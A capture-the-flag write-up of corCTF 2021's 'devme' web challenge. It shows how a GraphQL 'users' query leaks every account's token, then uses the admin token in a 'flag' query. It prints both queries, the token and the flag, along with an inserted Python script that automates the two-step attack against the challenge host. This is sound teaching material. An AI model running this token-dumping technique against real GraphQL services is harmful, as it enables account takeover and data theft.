devme corCTF Web challenge writeup
Introduction
Hello guys, back again with another tutorial. This time I am going to show you how I solved the devme challenge from corCTF 2021. You are given a web page, and manual enumeration reveals that it is running GraphQL under the hood. When the GraphQL endpoint is passed an email address it creates a user whose username is a SHA-256 hash. We later find that we can run three different operations:
- A mutation, which basically allows us to add a user to the database
- A users query, which returns every user together with their corresponding token from the stored data
- Lastly, a flag query, which leaks the flag if given the correct token (the admin's token)
Without further ado, let's jump in.
We have been given the following URL:
https://devme.be.ax/
On opening it we get a standard web page.
The first enumerations that I usually run are:
- A directory brute force using gobuster (you can use ffuf, feroxbuster or even wfuzz depending on your liking)
- A vulnerability scan using nikto
While they were running I decided to poke at the website and see what functionality it had.
The web application allows a user to sign up to get a free preview of a book.
So I decided to sign up using a fake email address to see what the form actually did, and intercepted the request using Burp Suite.
Looking at the screenshot of the intercepted request we see a couple of interesting pieces of information:
The website has a GraphQL endpoint and is using a mutation operation to create a user from the email address provided. Mutations are GraphQL operations that can modify back-end data (unlike queries); in our case the operation adds a user to the backend system.
The user created has a SHA-256 hash as the username.
The next thing we could do is query the schema (introspection) to see how much functionality we have. But I am going to show a really awesome tool that does all the tedious work for you and shows you the operations you are allowed to perform on the GraphQL API. The tool is called graphql-playground.
First download the AppImage from GitHub, make it executable and open it from your terminal.
Once the application has opened, click on "URL endpoint".
Then input the GraphQL endpoint URL and click "Open".
A new window will open where you can run your queries.
Looking at the schema we can run the three operations I explained before.
First I ran the users operation and queried the API for both the username and the token of each user.
The query that I used was:
query{users{username, token}}
Looking at the screenshot below, I was able to dump all the usernames with their respective tokens.
We are only interested in the admin's token, since it is the one that will give us the flag.
Next I ran the second query, which is used to retrieve the flag. The query used was:
query{flag(token:"3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b")}
And looking at the screenshot below we are able to retrieve the flag, which is:
corctf{ex_g00g13_3x_fac3b00k_t3ch_l3ad_as_a_s3rvice}
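The two-step flow above (dump users, pick the admin's token, pass it to flag) as a small added script, not part of the original writeup or the challenge. The root cause it exercises is an authorization flaw: the users resolver exposes every account's token to anyone who can reach the endpoint. The endpoint path, the sample response and the token values are assumptions or constructed placeholders.

```python
import json
import urllib.request

# Assumed endpoint path; the writeup only gives the host https://devme.be.ax/
GRAPHQL_URL = "https://devme.be.ax/graphql"

USERS_QUERY = "query{users{username, token}}"


def flag_query(token: str) -> str:
    """Build the flag query; json.dumps yields a valid GraphQL string literal."""
    return "query{flag(token:" + json.dumps(token) + ")}"


def find_admin_token(response: dict, admin_name: str = "admin"):
    """Return the admin's token from a users-query response, or None.

    Handles error responses (no "data" key) and an empty user list.
    """
    users = (response.get("data") or {}).get("users") or []
    for user in users:
        if user.get("username") == admin_name:
            return user.get("token")
    return None


def post_query(url: str, query: str) -> dict:
    """POST a GraphQL query as JSON and decode the JSON response."""
    body = json.dumps({"query": query}).encode()
    req = urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


# Constructed sample response in the shape the users query returns;
# these usernames and tokens are placeholders, not values from the challenge.
SAMPLE_USERS_RESPONSE = {
    "data": {
        "users": [
            {"username": "sha256-of-some-email", "token": "USER_TOKEN_PLACEHOLDER"},
            {"username": "admin", "token": "ADMIN_TOKEN_PLACEHOLDER"},
        ]
    }
}

if __name__ == "__main__":
    token = find_admin_token(post_query(GRAPHQL_URL, USERS_QUERY))
    print(post_query(GRAPHQL_URL, flag_query(token)) if token else "no admin user")
```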
And that's it for the challenge. This tutorial only touched the basics of GraphQL; I have seen SQL injection, command injection and more exploited through GraphQL, so take time and read up on it. But until next time, it's goodbye. If you liked the walkthrough don't forget to clap for me down below and follow me so that you won't miss any upcoming walkthroughs.